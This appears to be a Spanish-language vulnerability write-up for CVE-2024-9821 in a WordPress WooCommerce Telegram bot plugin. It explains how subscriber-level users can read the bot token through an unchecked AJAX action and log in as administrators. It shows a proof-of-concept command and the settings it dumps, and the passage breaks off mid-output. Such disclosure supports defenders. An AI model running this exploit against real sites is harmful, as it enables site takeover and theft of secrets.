
Bot para Telegram en WooCommerce <= 1.2.4 - Autenticado (Suscriptor+) Divulgación del token del bot de Telegram para eludir la autenticación
Bot for Telegram en WooCommerce <= 1.2.4 - Divulgación autenticada (Suscriptor+) del Token del Bot de Telegram que conduce a la Omisión de Autenticación
El plugin Bot for Telegram en WooCommerce para WordPress es vulnerable a la divulgación de información sensible debido a la falta de comprobaciones de autorización en la acción AJAX 'stm_wpcfto_get_settings' en todas las versiones hasta la 1.2.4 inclusive. Esto permite que atacantes autenticados, con acceso de nivel suscriptor o superior, vean el Token del Bot de Telegram, un token secreto utilizado para controlar el bot, el cual luego puede ser usado para iniciar sesión como cualquier usuario existente en el sitio, como un administrador, si conocen el nombre de usuario, gracias a la función Iniciar sesión con Telegram.``` Type: plugin CVSS Score: 8.8 CVE: CVE-2024-9821
* Slug: [bot-for-telegram-on-woocommerce](https://wordpress.org/plugin/bot-for-telegram-on-woocommerce)
* Download Link: [Download bot-for-telegram-on-woocommerce Version 1.2.4](https://downloads.wordpress.org/plugin/bot-for-telegram-on-woocommerce.zip)
POC
---```
python3 CVE-2024-9821.py -u http://kubernetes.docker.internal -un user -p user
---``` Vulnerability check: http://kubernetes.docker.internal Logged in successfully. { 'bot_settings': { 'fields': { 'bftow_bot_api': { 'label': 'Telegram ' 'Bot Token', 'type': 'text', 'value': '8164783304:Axxxxxxxxxxxxxxxxxxxxxxxxxx'}, 'bftow_bot_name': { 'description': 'Set ' 'if ' 'you ' 'want ' 'user ' 'to ' 'get ' 'back ' 'to ' 'Telegram ' 'after ' 'successful ' 'checkout. ' '(Without ' '"@")', 'label': 'Telegram ' 'Bot Name', 'type': 'text', 'value': 'Superbotman'}, 'bftow_buttons': { 'description': 'Save ' 'BOT ' 'Token ' 'first', 'label': 'Activate ' 'API URL', 'type': 'bftow_webhook_activation', 'value': ''}, 'bftow_google_maps_api_key': { 'description': '<a ' 'href="https://developers.google.com/maps/documentation/geocoding/overview">Provide ' 'Google ' 'Maps ' 'API ' 'key ' 'with ' 'enabled ' 'geocoding ' 'API ' 'and ' 'configured ' 'billing ' 'account. ' 'If ' 'you ' 'leave ' 'this ' 'field ' 'empty, ' 'the ' 'location ' 'will ' 'be ' 'taken ' 'via ' 'openstreetmap', 'label': 'Google ' 'Maps ' 'API ' 'key', 'pro': True, 'type': 'text', 'value': ''}, 'bftow_proxy_server': { 'label': 'Proxy '